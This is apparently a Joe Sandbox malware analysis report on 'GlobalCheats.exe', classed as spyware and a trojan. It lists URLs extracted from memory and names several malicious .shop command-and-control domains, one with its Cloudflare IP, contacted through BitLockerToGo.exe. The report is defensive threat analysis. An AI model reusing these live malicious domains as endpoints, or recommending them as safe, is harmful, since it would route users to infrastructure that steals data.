https://www.ecosia.org/newtab/	0%	URL Reputation	safe
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	0%	URL Reputation	safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	0%	URL Reputation	safe
http://crl.thawte.com/ThawteTimestampingCA.crl0	0%	URL Reputation	safe
http://x1.c.lencr.org/0	0%	URL Reputation	safe
http://x1.i.lencr.org/0	0%	URL Reputation	safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	0%	URL Reputation	safe
https://duckduckgo.com/ac/?q=	0%	Avira URL Cloud	safe
https://cdn.discordapp.com/banners/	0%	Avira URL Cloud	safe
https://github.com/urfave/cli/blob/main/docs/CHANGELOG.md#deprecated-cli-app-action-signatureERROR	0%	Avira URL Cloud	safe
richardflorespoew.shop	0%	Avira URL Cloud	safe
https://cdn.discordapp.com/icons/	0%	Avira URL Cloud	safe
https://github.com/golang/protobuf/issues/1609):	0%	Avira URL Cloud	safe
https://cdn.discordapp.com/guilds/	0%	Avira URL Cloud	safe
https:////iam.googleapishttp/v1/:genhttps://iamcrede	0%	Avira URL Cloud	safe
https://duckduckgo.com/chrome_newtab	0%	Avira URL Cloud	safe
https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.	0%	Avira URL Cloud	safe
https://discord.com/api/v9/oauth2/	0%	Avira URL Cloud	safe
https://management.usgovcloudapi.net/https://servicebus.usgovcloudapi.net/https://batch.core.usgovcl	0%	Avira URL Cloud	safe
https://discord.com/api/v9/guilds/	0%	Avira URL Cloud	safe
https://discord.com/api/v9/gateway/bot	0%	Avira URL Cloud	safe
https://github.com/urfave/cli/blob/main/docs/CHANGELOG.md#deprecated-cli-app-action-signaturee	0%	Avira URL Cloud	safe
http://www.topografix.com/GPX/1/1	0%	Avira URL Cloud	safe
https://iamcrede/v1/projects/-/s:generateAccessTGo/go1.22.4	0%	Avira URL Cloud	safe
http://www.opengis.net/gml/3.2	0%	Avira URL Cloud	safe
feighminoritsjda.shop	100%	Avira URL Cloud	malware
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi	0%	Avira URL Cloud	safe
https://discord.com/api/v9/users/	0%	Avira URL Cloud	safe
http://emojione.comEmojiOne	0%	Avira URL Cloud	safe
https://cdn.discordapp.com/attachments/	0%	Avira URL Cloud	safe
raiseboltskdlwpow.shop	0%	Avira URL Cloud	safe
http://scripts.sil.org/OFLhttp://scripts.sil.org/OFL	0%	Avira URL Cloud	safe
https://discord.com/api/v9/stage-instances	0%	Avira URL Cloud	safe
https://github.com/urfave/cli/blob/main/docs/CHANGELOG.md#deprecated-cli-app-action-signaturep	0%	Avira URL Cloud	safe
https://github.com/urfave/cli/blob/main/docs/CHANGELOG.md04	0%	Avira URL Cloud	safe
strwawrunnygjwu.shop	0%	Avira URL Cloud	safe
http://www.ascendercorp.com/typedesigners.html	0%	Avira URL Cloud	safe
https://github.com/urfave/cli/blob/main/docs/CHANGELOG.md#deprecated-cli-app-action-signatureAZaz	0%	Avira URL Cloud	safe
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94	0%	Avira URL Cloud	safe
http://dejavu.sourceforge.net	0%	Avira URL Cloud	safe
https://discord.com/api/v9//voice/regions	0%	Avira URL Cloud	safe
https://status.discord.com/api/v2/scheduled-maintenances/upcoming.json	0%	Avira URL Cloud	safe
http://www.ascendercorp.com/	0%	Avira URL Cloud	safe
https://vault.azure.net/mysql.database.azure.comhttps://cosmos.azure.comFailed	0%	Avira URL Cloud	safe
http://crl.rootca1.amazontrust.com/rootca1.crl0	0%	Avira URL Cloud	safe
pleasurenarrowsdla.shop	0%	Avira URL Cloud	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	Avira URL Cloud	safe
https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta	0%	Avira URL Cloud	safe
http://ocsp.rootca1.amazontrust.com0:	0%	Avira URL Cloud	safe
http://dejavu.sourceforge.nethttp://dejavu.sourceforge.netFonts	0%	Avira URL Cloud	safe
https://discord.com/api/v9/applications	0%	Avira URL Cloud	safe
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016	0%	Avira URL Cloud	safe
https://cdn.discordapp.com/role-icons/	0%	Avira URL Cloud	safe
https://discord.com/api/v9/	0%	Avira URL Cloud	safe
https://login.microsoftonline.com/https://gallery.usgovcloudapi.net/mariadb.database.usgovcloudapi.n	0%	Avira URL Cloud	safe
https://discord.com/api/v9/09Az~~	0%	Avira URL Cloud	safe
https://microsoftgraph.chinacloudapi.cnunmarshalScalar:	0%	Avira URL Cloud	safe
https://support.microsof	0%	Avira URL Cloud	safe
http://www.garmin.com/xmlschemas/TrainingCenterDatabase/v2	0%	Avira URL Cloud	safe
https://github.com/urfave/cli/blob/main/docs/CHANGELOG.md#deprecated-cli-app-action-signature	0%	Avira URL Cloud	safe
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples	0%	Avira URL Cloud	safe
http://www.opengis.net/gml/3.3/exr	0%	Avira URL Cloud	safe
backcreammykiel.shop	0%	Avira URL Cloud	safe
https://discord.com/api/v9/guilds/https://discord.com/api/v9/channels/https://discord.com/api/v9/use	0%	Avira URL Cloud	safe
https://api.midtrans.comInterSymbols-Regular.ttfradio-button-checked.svgSettings	0%	Avira URL Cloud	safe
http://dejavu.sourceforge.net/wiki/index.php/License	0%	Avira URL Cloud	safe
https://manage.chinacloudapi.com/publishsettings/indexhttps://manage.microsoftazure.de/publishsettin	0%	Avira URL Cloud	safe
https://discord.com/api/v9//sticker-packs	0%	Avira URL Cloud	safe
https://backcreammykiel.shop/api	0%	Avira URL Cloud	safe
justifycanddidatewd.shop	0%	Avira URL Cloud	safe
https://discord.com/api/v9/oauth2/applications	0%	Avira URL Cloud	safe
http://html4/loose.dtd	0%	Avira URL Cloud	safe
https://ossrdbms-aad.database.chinacloudapi.cnerror	0%	Avira URL Cloud	safe
https://database.usgovcloudapi.net/Error	0%	Avira URL Cloud	safe
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17	0%	Avira URL Cloud	safe
https://discord.com/api/v9/gateway	0%	Avira URL Cloud	safe
https://cdn.discordapp.com/splashes/	0%	Avira URL Cloud	safe
http://.css	0%	Avira URL Cloud	safe
http://www.opengis.net/gml	0%	Avira URL Cloud	safe
http://emojione.com/licensingColor	0%	Avira URL Cloud	safe
http://www.collada.org/2005/11/COLLADASchema	0%	Avira URL Cloud	safe
https:///v1/proj:generathttps://iamcredentials.09AZ__azRetryPolicyMessageBytes	0%	Avira URL Cloud	safe
https://status.discord.com/api/v2/scheduled-maintenances/	0%	Avira URL Cloud	safe
https://status.discord.com/api/v2/scheduled-maintenances/active.json	0%	Avira URL Cloud	safe
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install	0%	Avira URL Cloud	safe
https://discord.com/api/v9/guilds	0%	Avira URL Cloud	safe
http://dejavu.sourceforge.net/wiki/index.php/Licensehttp://dejavu.sourceforge.net/wiki/index.php/Lic	0%	Avira URL Cloud	safe
https://discord.com/api/v9/stickers/	0%	Avira URL Cloud	safe
https://support.mozilla.org/products/firefoxgro.all	0%	Avira URL Cloud	safe
https://discord.com/developers/docs/reference#authentication-example-bot-token-authorization-headerE	0%	Avira URL Cloud	safe
https://discord.com/api/v9/webhooks/	0%	Avira URL Cloud	safe
https://backcreammykiel.shop//	0%	Avira URL Cloud	safe
http://.jpg	0%	Avira URL Cloud	safe
https://manage.windowsazure.us/publishsettings/indexerror	0%	Avira URL Cloud	safe
http://www.ascendercorp.com/http://www.ascendercorp.com/http://www.ascendercorp.com/typedesigners.ht	0%	Avira URL Cloud	safe
https://datalake.azure.net/https://api.loganalytics.iohttps://graph.microsoft.us/https://api.loganal	0%	Avira URL Cloud	safe
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	0%	Avira URL Cloud	safe
https://backcreammykiel.shop/apiP	0%	Avira URL Cloud	safe
https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg	0%	Avira URL Cloud	safe
https://discord.com/api/v9//voice/	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
backcreammykiel.shop	104.21.90.18	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
richardflorespoew.shop	true	Avira URL Cloud: safe	unknown
feighminoritsjda.shop	true	Avira URL Cloud: malware	unknown
strwawrunnygjwu.shop	true	Avira URL Cloud: safe	unknown
raiseboltskdlwpow.shop	true	Avira URL Cloud: safe	unknown
pleasurenarrowsdla.shop	true	Avira URL Cloud: safe	unknown
backcreammykiel.shop	true	Avira URL Cloud: safe	unknown
https://backcreammykiel.shop/api	false	Avira URL Cloud: safe	unknown
justifycanddidatewd.shop	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	BitLockerToGo.exe, 00000004.00000003.1989305114.0000000003693000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https:////iam.googleapishttp/v1/:genhttps://iamcrede	GlobalCheats.exe, 00000000.00000002.1969067022.000000C000A32000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.discordapp.com/icons/	GlobalCheats.exe, 00000000.00000002.1969067022.000000C000AB8000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/ac/?q=	BitLockerToGo.exe, 00000004.00000003.1989305114.0000000003693000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.discordapp.com/banners/	GlobalCheats.exe, 00000000.00000002.1969067022.000000C000AB8000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/urfave/cli/blob/main/docs/CHANGELOG.md#deprecated-cli-app-action-signatureERROR	GlobalCheats.exe, 00000000.00000002.1965699973.000000C0001CC000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/golang/protobuf/issues/1609):	GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75C5ED000.00000002.00000001.01000000.00000003.sdmp	false	Avira URL Cloud: safe	unknown
https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.	BitLockerToGo.exe, 00000004.00000003.2012291283.0000000003694000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.discordapp.com/guilds/	GlobalCheats.exe, 00000000.00000002.1969067022.000000C000AB8000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://discord.com/api/v9/oauth2/	GlobalCheats.exe, 00000000.00000002.1969067022.000000C000AB8000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://discord.com/api/v9/gateway/bot	GlobalCheats.exe, 00000000.00000002.1969067022.000000C000AB8000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://discord.com/api/v9/guilds/	GlobalCheats.exe, 00000000.00000002.1969067022.000000C000AB8000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://management.usgovcloudapi.net/https://servicebus.usgovcloudapi.net/https://batch.core.usgovcl	GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75C5ED000.00000002.00000001.01000000.00000003.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/urfave/cli/blob/main/docs/CHANGELOG.md#deprecated-cli-app-action-signaturee	GlobalCheats.exe, 00000000.00000002.1965699973.000000C000000000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.topografix.com/GPX/1/1	GlobalCheats.exe, 00000000.00000002.1965699973.000000C000036000.00000004.00001000.00020000.00000000.sdmp, GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75C5ED000.00000002.00000001.01000000.00000003.sdmp	false	Avira URL Cloud: safe	unknown
https://iamcrede/v1/projects/-/s:generateAccessTGo/go1.22.4	GlobalCheats.exe, 00000000.00000002.1969067022.000000C0009CE000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi	BitLockerToGo.exe, 00000004.00000003.2012291283.0000000003694000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.opengis.net/gml/3.2	GlobalCheats.exe, 00000000.00000002.1965699973.000000C000036000.00000004.00001000.00020000.00000000.sdmp, GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75C5ED000.00000002.00000001.01000000.00000003.sdmp	false	Avira URL Cloud: safe	unknown
http://emojione.comEmojiOne	GlobalCheats.exe	false	Avira URL Cloud: safe	unknown
https://discord.com/api/v9/users/	GlobalCheats.exe, 00000000.00000002.1969067022.000000C000AB8000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/urfave/cli/blob/main/docs/CHANGELOG.md#deprecated-cli-app-action-signaturep	GlobalCheats.exe, 00000000.00000002.1965699973.000000C000100000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.discordapp.com/attachments/	GlobalCheats.exe, 00000000.00000002.1969067022.000000C000AB8000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.ascendercorp.com/typedesigners.html	GlobalCheats.exe	false	Avira URL Cloud: safe	unknown
https://github.com/urfave/cli/blob/main/docs/CHANGELOG.md04	GlobalCheats.exe, 00000000.00000002.1965699973.000000C000084000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://scripts.sil.org/OFLhttp://scripts.sil.org/OFL	GlobalCheats.exe	false	Avira URL Cloud: safe	unknown
https://discord.com/api/v9/stage-instances	GlobalCheats.exe, 00000000.00000002.1969067022.000000C000AB8000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94	BitLockerToGo.exe, 00000004.00000003.2012291283.0000000003694000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/urfave/cli/blob/main/docs/CHANGELOG.md#deprecated-cli-app-action-signatureAZaz	GlobalCheats.exe, 00000000.00000002.1965699973.000000C00027F000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://discord.com/api/v9//voice/regions	GlobalCheats.exe, 00000000.00000002.1969067022.000000C000AB8000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://dejavu.sourceforge.net	GlobalCheats.exe	false	Avira URL Cloud: safe	unknown
https://vault.azure.net/mysql.database.azure.comhttps://cosmos.azure.comFailed	GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75C5ED000.00000002.00000001.01000000.00000003.sdmp	false	Avira URL Cloud: safe	unknown
https://status.discord.com/api/v2/scheduled-maintenances/upcoming.json	GlobalCheats.exe, 00000000.00000002.1969067022.000000C0008AC000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.ascendercorp.com/	GlobalCheats.exe	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	BitLockerToGo.exe, 00000004.00000003.1989305114.0000000003693000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.rootca1.amazontrust.com/rootca1.crl0	BitLockerToGo.exe, 00000004.00000003.2010681855.000000000584D000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta	BitLockerToGo.exe, 00000004.00000003.2012291283.0000000003694000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://ocsp.rootca1.amazontrust.com0:	BitLockerToGo.exe, 00000004.00000003.2010681855.000000000584D000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016	BitLockerToGo.exe, 00000004.00000003.1988591576.000000000586D000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1988591576.0000000005866000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://discord.com/api/v9/applications	GlobalCheats.exe, 00000000.00000002.1969067022.000000C000AB8000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.ecosia.org/newtab/	BitLockerToGo.exe, 00000004.00000003.1989305114.0000000003693000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	BitLockerToGo.exe, 00000004.00000003.2011881474.0000000005966000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://dejavu.sourceforge.nethttp://dejavu.sourceforge.netFonts	GlobalCheats.exe	false	Avira URL Cloud: safe	unknown
https://cdn.discordapp.com/role-icons/	GlobalCheats.exe, 00000000.00000002.1969067022.000000C000AB8000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://discord.com/api/v9/	GlobalCheats.exe, 00000000.00000002.1969067022.000000C0009CE000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://discord.com/api/v9/09Az~~	GlobalCheats.exe, 00000000.00000002.1969067022.000000C0009CE000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://login.microsoftonline.com/https://gallery.usgovcloudapi.net/mariadb.database.usgovcloudapi.n	GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75C5ED000.00000002.00000001.01000000.00000003.sdmp	false	Avira URL Cloud: safe	unknown
https://support.microsof	BitLockerToGo.exe, 00000004.00000003.1988591576.000000000586D000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://microsoftgraph.chinacloudapi.cnunmarshalScalar:	GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75C5ED000.00000002.00000001.01000000.00000003.sdmp	false	Avira URL Cloud: safe	unknown
http://www.garmin.com/xmlschemas/TrainingCenterDatabase/v2	GlobalCheats.exe, 00000000.00000002.1965699973.000000C000040000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/urfave/cli/blob/main/docs/CHANGELOG.md#deprecated-cli-app-action-signature	GlobalCheats.exe, 00000000.00000002.1965699973.000000C0001CC000.00000004.00001000.00020000.00000000.sdmp, GlobalCheats.exe, 00000000.00000002.1965699973.000000C00027F000.00000004.00001000.00020000.00000000.sdmp, GlobalCheats.exe, 00000000.00000002.1965699973.000000C000100000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.opengis.net/gml/3.3/exr	GlobalCheats.exe, 00000000.00000002.1965699973.000000C000036000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://discord.com/api/v9/guilds/https://discord.com/api/v9/channels/https://discord.com/api/v9/use	GlobalCheats.exe, 00000000.00000002.1969067022.000000C000AB8000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples	BitLockerToGo.exe, 00000004.00000003.1988591576.0000000005842000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.midtrans.comInterSymbols-Regular.ttfradio-button-checked.svgSettings	GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75C5ED000.00000002.00000001.01000000.00000003.sdmp	false	Avira URL Cloud: safe	unknown
https://discord.com/api/v9//sticker-packs	GlobalCheats.exe, 00000000.00000002.1969067022.000000C000AB8000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://dejavu.sourceforge.net/wiki/index.php/License	GlobalCheats.exe	false	Avira URL Cloud: safe	unknown
https://manage.chinacloudapi.com/publishsettings/indexhttps://manage.microsoftazure.de/publishsettin	GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75C5ED000.00000002.00000001.01000000.00000003.sdmp	false	Avira URL Cloud: safe	unknown
https://discord.com/api/v9/oauth2/applications	GlobalCheats.exe, 00000000.00000002.1969067022.000000C000AB8000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://html4/loose.dtd	GlobalCheats.exe	false	Avira URL Cloud: safe	unknown
https://ossrdbms-aad.database.chinacloudapi.cnerror	GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75C5ED000.00000002.00000001.01000000.00000003.sdmp	false	Avira URL Cloud: safe	unknown
https://discord.com/api/v9/gateway	GlobalCheats.exe, 00000000.00000002.1969067022.000000C000AB8000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://database.usgovcloudapi.net/Error	GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75C5ED000.00000002.00000001.01000000.00000003.sdmp	false	Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	BitLockerToGo.exe, 00000004.00000003.1989305114.0000000003693000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17	BitLockerToGo.exe, 00000004.00000003.1988591576.000000000586D000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1988591576.0000000005866000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://.css	GlobalCheats.exe	false	Avira URL Cloud: safe	unknown
http://emojione.com/licensingColor	GlobalCheats.exe	false	Avira URL Cloud: safe	unknown
https://cdn.discordapp.com/splashes/	GlobalCheats.exe, 00000000.00000002.1969067022.000000C000AB8000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.opengis.net/gml	GlobalCheats.exe, 00000000.00000002.1965699973.000000C000036000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.collada.org/2005/11/COLLADASchema	GlobalCheats.exe, 00000000.00000002.1965699973.000000C00003A000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https:///v1/proj:generathttps://iamcredentials.09AZ__azRetryPolicyMessageBytes	GlobalCheats.exe, 00000000.00000002.1969067022.000000C0009CE000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.thawte.com/ThawteTimestampingCA.crl0	GlobalCheats.exe	false	URL Reputation: safe	unknown
http://x1.c.lencr.org/0	BitLockerToGo.exe, 00000004.00000003.2010681855.000000000584D000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://x1.i.lencr.org/0	BitLockerToGo.exe, 00000004.00000003.2010681855.000000000584D000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install	BitLockerToGo.exe, 00000004.00000003.1988591576.0000000005842000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	BitLockerToGo.exe, 00000004.00000003.1989305114.0000000003693000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://status.discord.com/api/v2/scheduled-maintenances/	GlobalCheats.exe, 00000000.00000002.1969067022.000000C0009CE000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://status.discord.com/api/v2/scheduled-maintenances/active.json	GlobalCheats.exe, 00000000.00000002.1969067022.000000C0008AC000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://dejavu.sourceforge.net/wiki/index.php/Licensehttp://dejavu.sourceforge.net/wiki/index.php/Lic	GlobalCheats.exe	false	Avira URL Cloud: safe	unknown
https://discord.com/api/v9/guilds	GlobalCheats.exe, 00000000.00000002.1969067022.000000C000AB8000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://discord.com/developers/docs/reference#authentication-example-bot-token-authorization-headerE	GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75C5ED000.00000002.00000001.01000000.00000003.sdmp	false	Avira URL Cloud: safe	unknown
https://discord.com/api/v9/stickers/	GlobalCheats.exe, 00000000.00000002.1969067022.000000C000AB8000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://discord.com/api/v9/webhooks/	GlobalCheats.exe, 00000000.00000002.1969067022.000000C000AB8000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://support.mozilla.org/products/firefoxgro.all	BitLockerToGo.exe, 00000004.00000003.2011881474.0000000005966000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://backcreammykiel.shop//	BitLockerToGo.exe, 00000004.00000002.2076899887.0000000003691000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2075627627.0000000003691000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://manage.windowsazure.us/publishsettings/indexerror	GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75C5ED000.00000002.00000001.01000000.00000003.sdmp	false	Avira URL Cloud: safe	unknown
http://.jpg	GlobalCheats.exe	false	Avira URL Cloud: safe	unknown
http://www.ascendercorp.com/http://www.ascendercorp.com/http://www.ascendercorp.com/typedesigners.ht	GlobalCheats.exe	false	Avira URL Cloud: safe	unknown
https://datalake.azure.net/https://api.loganalytics.iohttps://graph.microsoft.us/https://api.loganal	GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75C5ED000.00000002.00000001.01000000.00000003.sdmp	false	Avira URL Cloud: safe	unknown
https://discord.com/api/v9//voice/	GlobalCheats.exe, 00000000.00000002.1969067022.000000C000AB8000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg	BitLockerToGo.exe, 00000004.00000003.2012291283.0000000003694000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	BitLockerToGo.exe, 00000004.00000003.1989305114.0000000003693000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://backcreammykiel.shop/apiP	BitLockerToGo.exe, 00000004.00000003.2075627627.0000000003669000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000002.2076833590.0000000003670000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2075944981.000000000366F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
104.21.90.18	backcreammykiel.shop	United States		13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1459156
Start date and time:	2024-06-18 22:58:16 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 52s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	7
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	GlobalCheats.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@3/0@1/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 93% Number of executed functions: 28 Number of non-executed functions: 59
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: GlobalCheats.exe

Simulations

Behavior and APIs

Time	Type	Description
16:59:39	API Interceptor	7x Sleep call for process: BitLockerToGo.exe modified

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
